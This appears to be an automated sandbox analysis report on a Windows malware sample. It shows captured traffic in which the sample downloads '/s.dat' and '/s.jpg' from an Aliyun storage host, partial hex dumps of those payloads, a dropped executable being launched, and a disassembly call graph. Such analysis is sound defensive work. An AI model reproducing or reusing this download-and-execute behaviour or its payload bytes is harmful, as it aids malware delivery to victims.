                                    2025-01-13 12:47:40 UTC4096INData Raw: 82 6b 24 f1 76 c7 84 af a6 d8 72 87 9e 02 98 c2 20 b2 f1 7e 40 de 11 c4 b7 04 70 3b 4c f8 6d db 2d a9 ce 60 f5 10 4c 12 54 c5 c0 72 2e a1 d8 20 3a 3e 2a 25 eb 4b 0d 65 55 1a c4 48 1a 5e 6a 05 eb 8f 85 11 75 4e 9c 4d 91 ea 1e 6c 58 58 23 d5 a9 a7 43 0b 1c de b1 07 fa 5d 5e fb 87 19 ab 0f 82 15 1e ba 6f f1 63 c6 da 5d 0e ab af 31 1b bf 5a cd f6 53 1f 80 ab 2c 54 0f 0f 1b 81 1b a2 ce 13 0d 34 7e c8 33 6a cb 2c 24 f8 95 15 fe 8e 9d b5 5f fa 6f 6b 71 de 1e b5 8b 59 19 1d 09 5e ac 7c 16 63 9b d8 c8 b4 27 9d 9d bb 43 03 b0 6a a2 cc 20 6c 87 15 fd 83 53 0b 74 ba be 94 f4 dc 67 c5 f1 cb 96 3f f5 5d c0 5a b8 19 35 ae dd 45 b8 22 e8 49 6d f7 25 8d 40 da 70 d0 35 af 4d f4 b8 23 50 f0 45 df 6d c4 90 0a 98 39 7d 78 78 2e 64 92 61 cf c0 27 77 aa e9 3f f8 8d 38 ff 14 79
                                    Data Ascii: k$vr ~@p;Lm-`LTr. :>*%KeUH^juNMlXX#C]^oc]1ZS,T4~3j,$_okqY^|c'Cj lStg?]Z5E"Im%@p5M#PEm9}xx.da'w?8y
                                    2025-01-13 12:47:40 UTC4096INData Raw: 7d 65 0f 82 22 33 6c 58 70 0d b8 a6 df ea 7b 6d 7a 5f 99 fd 73 8d 00 c9 26 96 32 5f 9a 2d 5f 52 cd c3 af 35 d2 10 ab ac 7d 75 1f 92 32 53 12 21 c0 0e a8 ca d8 dd c7 d0 35 03 63 e9 2c 3e eb 04 88 24 5d 20 1c fa f5 63 e0 67 b3 2a db a8 82 4f 91 91 6e 78 3a 77 32 95 d2 d2 f3 31 f7 3a 09 7f 6b 09 80 20 ed f3 ca fa b6 ca 1e 07 6f f1 ea 8e 7e 4f df f1 ee 66 ca 0f a7 51 14 14 36 25 dc 96 50 91 b0 60 93 09 88 28 f5 58 20 ee bf f1 ff 75 17 d6 a0 c8 e1 27 4f 1e 06 29 03 1c 90 34 5d e2 3e e3 1d 28 c6 67 37 ac 93 2b e2 78 8e 2e d7 4d 83 2a 0a 90 3e 9f 8f 15 a3 7a 0a 90 76 d6 47 dd 4b e2 82 19 56 f6 3f ee a6 6f 8c 4a 79 5f df 1d 79 90 90 40 b3 29 a8 08 35 66 cc 97 f8 29 cb b8 4b 89 f7 f9 13 42 7a ec 0b d1 0c f7 79 ec 74 3d d3 55 25 47 d7 82 00 94 7d a5 84 da b6 7d d4
                                    Data Ascii: }e"3lXp{mz_s&2_-_R5}u2S!5c,>$] cg*Onx:w21:k o~OfQ6%P`(X u'O)4]>(g7+x.M*>zvGKV?oJy_y@)5f)KBzyt=U%G}}
                                    2025-01-13 12:47:40 UTC4096INData Raw: e8 d2 e7 86 d8 b8 2d 86 04 1b e1 8b 98 09 7a 3b fe 9c 4d 52 15 f8 12 ed 29 9d a8 0f 40 e6 e5 0b eb ad 15 c7 ff 17 26 89 1c e1 b5 91 c7 16 33 50 17 9c 37 41 d3 06 73 61 28 5f ab 72 93 98 00 8a 6a 27 25 8b 41 b0 e7 2a 40 2e 6b be e6 f0 18 0c d2 28 51 ab 0c 08 02 67 5f 1a 0c 87 3a cc d9 74 dd c0 fd 7b 99 48 59 37 8d c3 26 3f 4d cf ea ea 8f 47 36 91 83 9c f4 2f 52 87 f9 10 b6 44 68 27 93 d2 36 2f 5d 2c 59 59 de 90 b4 e8 85 d4 e9 71 8f 42 65 b0 d8 16 f6 ff 1e 3b 4d 23 fa 1f 9e 5f 66 d6 96 8f 3f 35 40 28 de 44 3a fe c4 20 45 37 b3 18 0e ff ad 2b a7 83 7e 88 3a 6c b9 b9 31 4d dd 30 2d 5f e5 98 94 26 e7 f1 17 4f ba 13 8e 17 f2 ca 4c 08 6f 8e 74 4a 05 8d c4 24 3d 4b fb 22 c3 67 31 f6 85 11 26 a8 6e cf 31 7a 78 b7 f3 05 66 c0 b6 4d c3 3a 0e 1c bb 55 6d 30 27 5a a7
                                    Data Ascii: -z;MR)@&3P7Asa(_rj'%A*@.k(Qg_:t{HY7&?MG6/RDh'6/],YYqBe;M#_f?5@(D: E7+~:l1M0-_&OLotJ$=K"g1&n1zxfM:Um0'Z
                                    2025-01-13 12:47:40 UTC4096INData Raw: ed 6d 99 07 e4 c7 b2 15 b2 42 6c 84 38 c1 7d 64 0c 9a 79 ff 71 01 27 59 e8 ac 0f 20 7d b1 81 7f 87 9c 7d 37 13 a4 d8 58 fb d7 aa 0d 1a 88 06 95 72 33 fc a9 08 eb 61 e5 1b 19 63 d2 aa 09 e2 b9 52 e1 a4 8a 08 e0 3b 67 e2 cf e9 55 97 b7 28 79 76 3f a4 7b d0 9c 14 c0 80 dc ab f5 4d 7c f8 cf 89 4a 4c ec 7a 99 13 8b 9f bf 89 fd cb 07 5c 57 9b f8 f0 51 1b 72 ea b3 52 b0 4e d4 50 16 0e f6 43 a8 45 5e f8 99 90 3e a9 4a 8f 23 54 4d 98 d2 f6 51 e0 54 ce c8 f3 3b ec 5d 4b 96 31 6f 39 fe 82 8b 66 a4 22 6a 74 1d 57 6f 34 15 b0 16 87 b1 79 02 74 8a 6e 8c ba ef c4 ed 35 cc c8 82 2e 56 35 d3 9b 89 05 6d 16 f0 98 8a 0e 66 25 2b c7 a1 c9 f5 3e b0 50 22 fe a6 40 5f f9 be 1c 04 3a 5e 6a f5 4b 68 7a cb ed b4 ba f8 98 a8 7f 86 9c b5 87 da e8 1e 72 b0 c5 a5 2a a9 48 4a cf 41 64
                                    Data Ascii: mBl8}dyq'Y }}7Xr3acR;gU(yv?{M|JLz\WQrRNPCE^>J#TMQT;]K1o9f"jtWo4ytn5.V5mf%+>P"@_:^jKhzr*HJAd


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    5192.168.2.45000759.110.190.214436452C:\Users\user\Desktop\149876985-734579485.05.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-13 12:47:47 UTC106OUTGET /s.dat HTTP/1.1
                                    User-Agent: 3M
                                    Host: khec3y.oss-cn-beijing.aliyuncs.com
                                    Cache-Control: no-cache
                                    2025-01-13 12:47:48 UTC560INHTTP/1.1 200 OK
                                    Server: AliyunOSS
                                    Date: Mon, 13 Jan 2025 12:47:48 GMT
                                    Content-Type: application/octet-stream
                                    Content-Length: 28272
                                    Connection: close
                                    x-oss-request-id: 67850B740BFF4B3237A0E79C
                                    Accept-Ranges: bytes
                                    ETag: "B10ADDCAA76BBC279C2822E8AB49889E"
                                    Last-Modified: Mon, 13 Jan 2025 12:47:32 GMT
                                    x-oss-object-type: Normal
                                    x-oss-hash-crc64ecma: 6282813583600053757
                                    x-oss-storage-class: Standard
                                    x-oss-ec: 0048-00000113
                                    Content-Disposition: attachment
                                    x-oss-force-download: true
                                    Content-MD5: sQrdyqdrvCecKCLoq0mIng==
                                    x-oss-server-time: 15
                                    2025-01-13 12:47:48 UTC3536INData Raw: f5 e2 28 b8 bb b8 b8 b8 bc b8 b8 b8 47 47 b8 b8 00 b8 b8 b8 b8 b8 b8 b8 f8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 50 b8 b8 b8 b6 a7 02 b6 b6 02 bf 7b 5a c3 7a 37 fa 16 63 5f 36 2c 7f 2f 5d 40 48 5d 3c 30 7d 3e 5f 50 50 51 25 71 33 34 14 46 41 5a 7a 33 34 7a 3e 35 29 5a 37 35 3e 3f 11 32 32 35 11 35 35 35 35 35 35 35 f6 81 47 5c db 89 40 66 e1 b3 7a 5c db 89 40 66 e1 b3 7b 5c e4 89 40 66 e8 cb e9 5c d8 89 40 66 e8 cb ef 5c d8 89 40 66 e8 cb f9 5c df 89 40 66 e8 cb f0 5c d5 89 40 66 e8 cb ee 5c da 89 40 66 e8 cb eb 5c da 89 40 66 34 0f 05 0e 89 db 12 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 c2 67 ad 62 62 62 62 62 62 62 62 62 92 62 40
                                    Data Ascii: (GGP{Zz7c_6,/]@H]<0}>_PPQ%q34FAZz34z>5)Z75>?2255555555G\@fz\@f{\@f\@f\@f\@f\@f\@f\@f44444444444444444444444444dq44P<4gbbbbbbbbbb@
                                    2025-01-13 12:47:48 UTC4096INData Raw: 5f 05 23 23 56 27 a8 d8 33 c7 9d eb 2b a7 66 a7 83 f7 ef 2a 7e 0e 7a 6b e6 23 60 e2 be c6 b2 1d 08 46 3b 1d 1d 96 61 39 69 71 02 d2 a7 c2 59 15 5c 9c 11 31 89 34 31 31 b1 d8 bd 31 31 31 75 0a e5 79 0d b1 b4 b1 b1 31 da 49 d9 4c 5a 4c 4c 04 8f f4 4c 3f fc 4a 38 87 86 87 87 47 ac 2b 0a cc 09 ff 1e 84 0f 49 6c b1 90 b1 b1 f5 7e eb b1 7e 8d 3a f7 23 23 1a 3d 55 1c 1d d6 90 84 dc 1d fe de b7 75 bb 43 f3 36 f6 f4 bf 7b a3 b3 eb 2a e6 12 a7 6d a3 a3 e2 1b a3 a2 a3 a3 2a 6f d6 6b 25 92 60 2b 43 ca 06 43 ab 0f b6 ab ab ea 54 6d e2 63 27 ca e3 e3 e3 ab 62 a7 72 63 62 62 26 59 54 26 eb df 9b 10 58 d2 12 1e 36 5a 99 c5 bd c1 d1 5a bd f5 b1 f9 32 75 91 d0 cf d0 cc 8d 90 93 92 51 5e 5e 5e 92 92 92 92 da 19 56 da 53 82 d2 92 1b fa 82 da 53 aa c2 92 1b ea b2 d3 87 92 86
                                    Data Ascii: _##V'3+f*~zk#`F;a9iqY\1411111uy1ILZLLL?J8G+Il~~:##=UuC6{*m*ok%`+CCTmc'brcbb&YT&X6ZZ2uQ^^^VSS
                                    2025-01-13 12:47:48 UTC4096INData Raw: 07 0a aa de df de de 96 1b c2 b2 b2 fa 3f fe 96 b6 d3 a5 5f 1a 6c 9f 6c b7 ab 28 48 78 54 49 48 48 b7 5d e9 fe e9 e9 a1 2c ed 85 91 6e 84 1f 86 86 86 0d c2 e6 f6 86 4f 14 4e cc b7 b2 c2 9e 3c 78 18 04 bf 47 bd ca b7 3a ef b6 5e d1 5e 5e 5e 1f 65 9d 2b 21 90 29 2b 2b 2b c2 ab ab ab ab 90 53 e5 ec d1 5a 0a 3a a6 25 5e a0 d3 84 58 97 f7 cf b6 cc 34 41 24 70 0c 90 28 46 0d 0d 0d 02 98 5b 1b 5b 9e 75 c7 a5 5d 28 4d 19 65 f9 41 2f 64 64 64 6b f1 32 72 32 f5 1e b0 76 0d 0f 78 1d 49 71 d5 6d 03 02 03 03 0c 99 cf 8f cf c7 24 ff 4c b4 4f 39 67 23 5f fb 43 09 42 43 43 4c d6 80 c0 03 ca 2b db 58 23 d1 ae b8 97 f2 8a b2 ff 9a ce f6 52 ea 84 85 84 84 3c 30 3c 3c 3c 33 78 e4 7d 56 a6 09 4a 0b 61 91 3e 15 7f 15 e5 91 fa a4 ce 15 ba ef 8f a4 54 fb 93 d2 b8 48 e7 ee a6 dc
                                    Data Ascii: ?_ll(HxTIHH],nON<xG:^^^^e+!)+++SZ:%^X4A$p(F[[u](MeA/dddk2r2vxIqm$LO9g#_CBCCL+X#R<0<<<3x}VJa>TH
                                    2025-01-13 12:47:48 UTC4096INData Raw: 30 4a 59 ce 0f c9 ba f8 0e 39 f9 8c 87 c4 73 45 cf 41 4f 0c f3 c4 84 0d fb cc 0f 79 76 31 fa 90 92 f6 1b 94 9e dd 17 7c 7e 1a f5 7d 8b bc 79 09 04 41 8a e0 e4 6b e4 ea a3 69 02 ee 67 ef a3 65 ad 2c a4 8c 89 f9 dc c1 4a 09 88 00 e9 03 74 14 5c 97 fd 1c 54 97 18 16 5f e9 df 5e d7 5f 2b ae e7 2d 4e a9 e4 2c 69 dc db 95 57 1f dc 10 00 1f 57 e0 d6 95 91 9f dc 6a a2 e2 6b 1f ec 56 94 dc 1f ba ba ba dc dc dc dc d3 c3 58 dc dc dc dc dc ba ba ba 4c 2a 2a dc 05 84 fc 05 25 25 25 56 67 2f ec 23 6d 95 21 e6 39 33 c9 71 ba 53 9a f2 33 72 2b 7f ba eb aa f2 31 75 3b 39 7d f6 69 77 34 cb fd 7c bd fc b5 f1 34 25 41 e1 7d fe 9d 62 94 e7 6b 6b 6b 0d 0d 0d 0d 02 12 89 0d 0d 0d 0d 0d 6b 9d 45 8c 76 8c 7c 73 8c 04 c6 cb eb cb cb cb 83 4a 22 4b 4b 4b 4b 44 5c 40 4e 4b 53 0f 41
                                    Data Ascii: 0JY9sEAOyv1|~}yAkige,Jt\T_^_+-N,iWWjkVXL**%%%Vg/#m!93qS3r+1u;9}iw4|4%A}bkkkkEv|sJ"KKKKD\@NKSA
                                    2025-01-13 12:47:48 UTC4096INData Raw: 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 68 7b 60 ab 47 9b e3 20 f9 68 ad 35 1d 35 35 35 7d b8 79 11 31 ee 04 f4 3b 0b 0b bc 31 f0 98 9c 63 89 4e 53 ac ac 1b d8 93 d0 27 cd 15 02 32 32 7a b1 f6 02 59 c1 ce ce 92 ce 8a ce a1 ce bd ce 8a ce ab ce b8 ce a7 ce ad ce ab ce bd ce 92 ce 9a ce bc ce bb ce ab ce 9d ce a7 ce a9 ce a6 ce ba ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce
                                    Data Ascii: ((((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
                                    2025-01-13 12:47:48 UTC4096INData Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c
                                    Data Ascii: ,$LDld=5}u]U
                                    2025-01-13 12:47:48 UTC4096INData Raw: 47 a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed e2
                                    Data Ascii: G<EB`."+LVpfVgUo0|\~:KbkY5xCM$8^330021228SXOBIFe-
                                    2025-01-13 12:47:48 UTC160INData Raw: bc 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 38 1e 05 8f
                                    Data Ascii: VH <dMs~/rSixpGTz& dnCz|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpS8


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    6192.168.2.45000859.110.190.214436452C:\Users\user\Desktop\149876985-734579485.05.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-13 12:47:49 UTC106OUTGET /s.jpg HTTP/1.1
                                    User-Agent: 3M
                                    Host: khec3y.oss-cn-beijing.aliyuncs.com
                                    Cache-Control: no-cache
                                    2025-01-13 12:47:50 UTC543INHTTP/1.1 200 OK
                                    Server: AliyunOSS
                                    Date: Mon, 13 Jan 2025 12:47:49 GMT
                                    Content-Type: image/jpeg
                                    Content-Length: 8299
                                    Connection: close
                                    x-oss-request-id: 67850B75F15BB23038E76760
                                    Accept-Ranges: bytes
                                    ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7"
                                    Last-Modified: Mon, 13 Jan 2025 11:34:40 GMT
                                    x-oss-object-type: Normal
                                    x-oss-hash-crc64ecma: 692387538176721524
                                    x-oss-storage-class: Standard
                                    x-oss-ec: 0048-00000104
                                    Content-Disposition: attachment
                                    x-oss-force-download: true
                                    Content-MD5: m9tqSvaBRwuFo9Rq9aTypw==
                                    x-oss-server-time: 2
                                    2025-01-13 12:47:50 UTC3553INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                    Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                    2025-01-13 12:47:50 UTC4096INData Raw: 6a 97 a0 76 9f 8a 4c ce c2 04 d4 99 b6 a3 2e 14 ad df 13 51 65 93 89 43 91 9f a1 22 66 8b 67 93 6a a2 a8 41 af 7a 2c ae 4c aa 83 63 3f 31 b1 0c 38 b2 5a bc ee 9f ac 38 b8 3b d8 89 02 c6 e4 8d 4f 83 68 c8 cb e9 cd 46 82 eb f8 de 65 da d0 b3 5f 34 d9 d6 6d db 55 d9 bc fb a3 e2 61 23 e6 e4 e3 87 ec ad ee cf c4 48 ef c7 73 cd d6 f3 c4 81 f4 1c 39 58 f8 db f6 39 e6 54 8a 0c ef 0e 3c c4 02 47 ce 01 4a eb 07 3d 8b cf 64 01 b1 11 50 1f 56 fc 58 fd 52 90 48 39 56 7e 31 61 02 cb 69 da d9 d8 cc 26 ee 13 ab 4c 25 c9 2d d0 31 03 dc f8 c8 d7 3b 32 53 27 d0 3e e3 d2 43 01 15 0b c5 c7 aa 26 cf 01 8d 0f 68 05 6c 61 40 dc 57 84 5a 54 79 13 7c 39 5f 3b 5d be 3a 5e 38 29 ef 27 40 e5 0e 2f e3 91 59 ab d5 8c 1a 9b 83 db 73 71 24 d7 68 16 7f 18 08 bb 51 3d 32 5b d8 c4 b1 43 a5
                                    Data Ascii: jvL.QeC"fgjAz,Lc?18Z8;OhFe_4mUa#Hs9X9T<GJ=dPVXRH9V~1ai&L%-1;2S'>C&hla@WZTy|9_;]:^8)'@/Ysq$hQ=2[C
                                    2025-01-13 12:47:50 UTC650INData Raw: f2 f5 18 89 8e 8a db 3d b5 89 92 61 93 d9 95 d6 f9 fa e8 f6 8e e8 f9 2d 9f 8a 17 a0 e4 d1 c1 a0 b7 a6 2d 71 ae f8 c9 d9 ef da b0 c5 da fa da d3 d9 f2 c0 b8 ea 98 18 bd f0 db b2 82 ae c3 ad a0 a8 b3 8b a8 a6 a7 8d 1d d0 9d 80 92 80 87 97 c7 d6 97 a8 da 92 be bd ad bf db e0 e5 e2 8f 56 e5 a7 8b 84 86 89 eb ec 39 ec a8 95 85 a2 81 d4 9a 95 92 8b 8a ab fa fc fd fe b4 45 53 4c 46 48 36 34 f8 7b 0a 05 0b 03 0d 01 0f 1f 11 1d 13 1b 15 19 17 e7 16 1a 14 1c 12 1e 10 20 2e 22 2c 24 2a 26 28 28 d6 25 2b 23 2d 21 2f 3f 31 3d 33 3b 35 39 37 37 39 3a 3b 3c f6 8f 1f 40 51 42 43 63 45 76 3f 0a e1 4a 4b 7c 4d 3e 1b 54 09 32 53 6c 7f 97 57 40 d9 5a 77 8c 5d 42 42 71 c9 62 63 ec 65 4a 47 68 75 52 6b 60 38 6f e3 30 71 6e 2b 70 63 16 77 76 2e 4a 69 7c 7d ee 7e 96 81 8c 84 90
                                    Data Ascii: =a--qV9ESLFH64{ .",$*&((%+#-!/?1=3;59779:;<@QBCcEv?JK|M>T2SlW@Zw]BBqbceJGhuRk`8o0qn+pcwv.Ji|}~


                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:0
                                    Start time:07:46:05
                                    Start date:13/01/2025
                                    Path:C:\Users\user\Desktop\149876985-734579485.05.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\Desktop\149876985-734579485.05.exe"
                                    Imagebase:0x140000000
                                    File size:30'939'136 bytes
                                    MD5 hash:D21CED168A5267499378453EEE404703
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:5
                                    Start time:07:47:49
                                    Start date:13/01/2025
                                    Path:C:\Users\user\Documents\S1JCyi.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Users\user\Documents\S1JCyi.exe "?Y5?(
                                    Imagebase:0x140000000
                                    File size:133'136 bytes
                                    MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 0%, ReversingLabs
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:6
                                    Start time:07:47:50
                                    Start date:13/01/2025
                                    Path:C:\Users\user\Documents\S1JCyi.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Users\user\Documents\S1JCyi.exe "?Y5?(
                                    Imagebase:0x140000000
                                    File size:133'136 bytes
                                    MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:7
                                    Start time:07:48:01
                                    Start date:13/01/2025
                                    Path:C:\Users\user\Documents\S1JCyi.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Users\user\Documents\S1JCyi.exe "?Y5?(
                                    Imagebase:0x140000000
                                    File size:133'136 bytes
                                    MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:false

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:2.1%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:32%
                                      Total number of Nodes:462
                                      Total number of Limit Nodes:7
                                      execution_graph 13939 140005df3 13940 140005e71 13939->13940 13941 140005e84 CreateFileA 13940->13941 13942 140005f50 __CxxFrameHandler 13941->13942 13943 140005fc3 malloc ReadFile 13942->13943 16579 7ffe1a4811b0 16581 7ffe1a481209 16579->16581 16580 7ffe1a4812b9 BuildCatchObjectHelperInternal 16583 7ffe1a481b90 51 API calls 16580->16583 16581->16580 16584 7ffe1a48129e 16581->16584 16585 7ffe1a4812c7 16581->16585 16596 7ffe1a4814f0 16581->16596 16597 7ffe1a481300 BuildCatchObjectHelperInternal 16581->16597 16582 7ffe1a481b70 _log10_special 8 API calls 16586 7ffe1a4814d3 16582->16586 16583->16597 16588 7ffe1a4814f6 16584->16588 16598 7ffe1a481b90 16584->16598 16589 7ffe1a481b90 51 API calls 16585->16589 16615 7ffe1a481110 16588->16615 16589->16580 16594 7ffe1a4814eb 16607 7ffe1a4879cc 16594->16607 16612 7ffe1a481a40 16596->16612 16597->16582 16599 7ffe1a481b9b 16598->16599 16600 7ffe1a4812b0 16599->16600 16601 7ffe1a487a4c BuildCatchObjectHelperInternal 2 API calls 16599->16601 16602 7ffe1a481bba 16599->16602 16600->16580 16600->16594 16601->16599 16603 7ffe1a481bc5 16602->16603 16621 7ffe1a4821f0 16602->16621 16604 7ffe1a481110 Concurrency::cancel_current_task 51 API calls 16603->16604 16606 7ffe1a481bcb 16604->16606 16608 7ffe1a487844 _invalid_parameter_noinfo_noreturn 47 API calls 16607->16608 16609 7ffe1a4879e5 16608->16609 16610 7ffe1a4879fc _invalid_parameter_noinfo_noreturn 17 API calls 16609->16610 16611 7ffe1a4879fa 16610->16611 16625 7ffe1a481b34 16612->16625 16616 7ffe1a48111e Concurrency::cancel_current_task 16615->16616 16617 7ffe1a483990 std::_Xinvalid_argument 2 API calls 16616->16617 16618 7ffe1a48112f 16617->16618 16619 7ffe1a48379c __std_exception_copy 49 API calls 16618->16619 16620 7ffe1a481159 16619->16620 16622 7ffe1a4821fe Concurrency::cancel_current_task 16621->16622 16623 7ffe1a483990 std::_Xinvalid_argument 2 API calls 16622->16623 16624 7ffe1a48220f 16623->16624 16630 7ffe1a481ab0 16625->16630 16628 7ffe1a483990 std::_Xinvalid_argument 2 API calls 16629 7ffe1a481b56 16628->16629 16631 7ffe1a48379c __std_exception_copy 49 API calls 16630->16631 16632 7ffe1a481ae4 16631->16632 16632->16628 15119 140007412 15121 140007333 15119->15121 15120 1400073e0 LdrLoadDll 15120->15121 15121->15120 15122 140007403 15121->15122 15527 140013670 InitializeCriticalSection CreateEventW CreateEventW CreateEventW 15530 1400054e0 15527->15530 15529 1400136ef 15531 14000552c 15530->15531 15534 140005506 _lock 15530->15534 15532 1400074d0 LdrLoadDll 15531->15532 15533 140005536 15532->15533 15535 140008370 3 API calls 15533->15535 15534->15529 15539 140005545 __CxxFrameHandler 15535->15539 15536 1400055b8 15537 140008de0 _lock 2 API calls 15536->15537 15538 1400055c0 sprintf_s 15537->15538 15538->15534 15539->15536 15540 1400074f0 LdrLoadDll 15539->15540 15541 140005561 CreateThread 15540->15541 15541->15538 15542 1400055b0 GetLastError 15541->15542 15542->15536 13948 140005a70 GetStartupInfoW GetProcessHeap HeapAlloc 13949 140005ab1 13948->13949 13950 140005add GetVersionExA 13948->13950 13951 140005abf 13949->13951 13998 140009540 13949->13998 13952 140005b0e GetProcessHeap HeapFree 13950->13952 13953 140005af0 GetProcessHeap HeapFree 13950->13953 14006 140009300 13951->14006 13958 140005b3c 13952->13958 13954 140005d0b 13953->13954 13957 140005ac9 14017 140008510 GetModuleHandleA 13957->14017 14021 14000a310 HeapCreate 13958->14021 13961 140005bec 13962 140005c12 13961->13962 13963 140005bf0 13961->13963 